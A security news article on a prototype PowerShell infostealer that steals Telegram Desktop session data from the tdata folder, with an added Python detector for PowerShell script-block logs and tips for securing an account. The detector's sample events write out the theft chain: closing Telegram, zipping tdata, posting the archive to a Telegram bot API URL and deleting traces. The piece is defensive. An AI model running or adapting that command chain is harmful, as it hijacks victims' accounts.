Hackers Are Using Fake Windows Updates to Hijack Telegram Sessions

A new Telegram session hijacking method is targeting Windows users, allowing cybercriminals to bypass passwords and two-factor authentication entirely. Disguised as a routine Windows telemetry update, a malicious PowerShell script is actively being tested to silently steal authorization keys directly from unprotected computers. By targeting the local files where Telegram stores its active login sessions, attackers can clone access to the account without ever needing to intercept a verification code.

The attack centers on the tdata folder, the specific directory where Telegram for Windows stores the authorization keys used to keep users logged into its servers. When the disguised PowerShell script executes, it first gathers basic system information, including the username, hostname, and public IP address. It then forces the Telegram Desktop application to close, unlocking the local files for editing and extraction.

Once the application is closed, the script zips the entire contents of the tdata folder into a temporary directory. This archive is then forwarded directly to the attackers via a Telegram bot, and the script wipes the temporary files from the computer to hide its tracks. If successful, the attackers gain persistent access to the victim's account until the user manually identifies and terminates the rogue session.
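The behaviour described above leaves a recognisable trail in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The following Python detection logic is an added example, not code from the article or from the researchers who found the script: it reassembles 4104 fragments by ScriptBlockId and flags a block that closes Telegram, touches a tdata directory, builds an archive, contacts a Telegram bot, and cleans up. The sample events, the variable names in them, and the assumption that exfiltration goes through the Telegram Bot API host api.telegram.org are constructed for this example.

```python
import re
from collections import defaultdict

# Indicators mirror the stages described in the article; each is a
# (stage, pattern) pair matched case-insensitively against script text.
INDICATORS = [
    ("kill_telegram", re.compile(r"(Stop-Process|taskkill)[^\r\n]*telegram", re.I)),
    ("tdata_access", re.compile(r"\btdata\b", re.I)),
    ("archive", re.compile(r"Compress-Archive|\[IO\.Compression\.ZipFile\]", re.I)),
    # Assumption: the bot upload goes to the Telegram Bot API on api.telegram.org.
    ("bot_exfil", re.compile(r"api\.telegram\.org/bot", re.I)),
    ("cleanup", re.compile(r"Remove-Item[^\r\n]*-Recurse", re.I)),
]

# Both of these must be present, plus at least one more stage, before a block is flagged.
REQUIRED = {"tdata_access", "bot_exfil"}
MIN_STAGES = 3


def stages_in(text):
    """Return the set of indicator stages matched by one piece of script text."""
    return {stage for stage, pat in INDICATORS if pat.search(text)}


def assemble(events):
    """Join 4104 fragments sharing a ScriptBlockId into one text, in MessageNumber order."""
    parts = defaultdict(list)
    for ev in events:
        parts[ev["ScriptBlockId"]].append((ev["MessageNumber"], ev["ScriptBlockText"]))
    return {sbid: "\n".join(t for _, t in sorted(frags)) for sbid, frags in parts.items()}


def detect(events):
    """Return {ScriptBlockId: sorted stage list} for blocks that match the theft chain."""
    hits = {}
    for sbid, text in assemble(events).items():
        stages = stages_in(text)
        if REQUIRED <= stages and len(stages) >= MIN_STAGES:
            hits[sbid] = sorted(stages)
    return hits


# Constructed sample events (field names follow Event ID 4104); not real telemetry.
SAMPLE_EVENTS = [
    # Benign admin task: archives IIS logs to an internal share, then prunes them.
    {"ScriptBlockId": "a1", "MessageNumber": 1, "ScriptBlockText": r"""Compress-Archive -Path C:\inetpub\logs -DestinationPath \\fs01\backup\iis.zip
Remove-Item C:\inetpub\logs\*.log -Recurse"""},
    # Benign: an updater that restarts Telegram after patching it.
    {"ScriptBlockId": "b2", "MessageNumber": 1, "ScriptBlockText": r"""Stop-Process -Name Telegram -ErrorAction SilentlyContinue
Start-Process $telegramExe"""},
    # Stand-in for the stealer's chain, split across two fragments logged out of order.
    {"ScriptBlockId": "c3", "MessageNumber": 2, "ScriptBlockText": r"""Invoke-RestMethod -Uri "https://api.telegram.org/bot<TOKEN>/<method>" -Method Post -InFile $zip
Remove-Item $tmp -Recurse -Force"""},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "ScriptBlockText": r"""Stop-Process -Name Telegram -Force
$tmp = Join-Path $env:TEMP wu
Compress-Archive -Path $tdata -DestinationPath $zip"""},
]

if __name__ == "__main__":
    for sbid, stages in detect(SAMPLE_EVENTS).items():
        print(f"ALERT ScriptBlockId={sbid} stages={stages}")
```

Requiring both the tdata reference and the bot-API contact keeps the benign log rotation (archive plus cleanup) and the legitimate Telegram restart from alerting, while the reassembly step matters because PowerShell splits larger scripts across several 4104 events and a single fragment rarely shows the whole chain.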

Fortunately, security researchers intercepted this infostealer while it was still in its prototype testing phase. The bot receiving the stolen data was operating under a burner handle, afhbhfsdvfh_bot, with the explicit description "Telegram attacker." Because the malware has not yet been deployed at scale, experts have found no evidence of massive data transfers or widespread account compromises.

How to Secure Your Telegram Account

Because this attack relies on stealing local session data rather than guessing passwords, defending against it requires securing both your device and your app settings. Security experts recommend maintaining a robust endpoint security suite that blocks malicious PowerShell scripts delivered through email attachments or untrustworthy downloads from executing.

  • Monitor active sessions: Regularly check your account for unauthorized access. Go to Settings, select Devices, and click Terminate all other sessions if you spot unrecognized activity.
  • Enable Two-Step Verification: Add a cloud password by navigating to Settings, then Privacy and Security, and selecting Two-Step Verification.
  • Upgrade to Passkeys: For top-tier protection against phishing, set up passwordless authentication by going to Settings, then Privacy and Security, and selecting Passkeys.

The Silent Threat of Session Tokens

This PowerShell prototype highlights a critical shift in the cybercriminal playbook: attackers are increasingly abandoning traditional credential phishing in favor of session token theft. When a hacker steals the tdata folder, they are essentially stealing the "VIP pass" that tells Telegram's servers the user has already successfully logged in. This renders even the most complex passwords and SMS-based two-factor authentication completely useless.

The discovery of this script serves as a stark reminder that application security cannot exist in a vacuum. You can lock down your Telegram account with passkeys and cloud passwords, but if the underlying Windows operating system is compromised by an infostealer, those app-level defenses are bypassed entirely. As threat actors continue to refine these automated extraction tools, users must treat their local application data with the same level of caution as their master passwords.
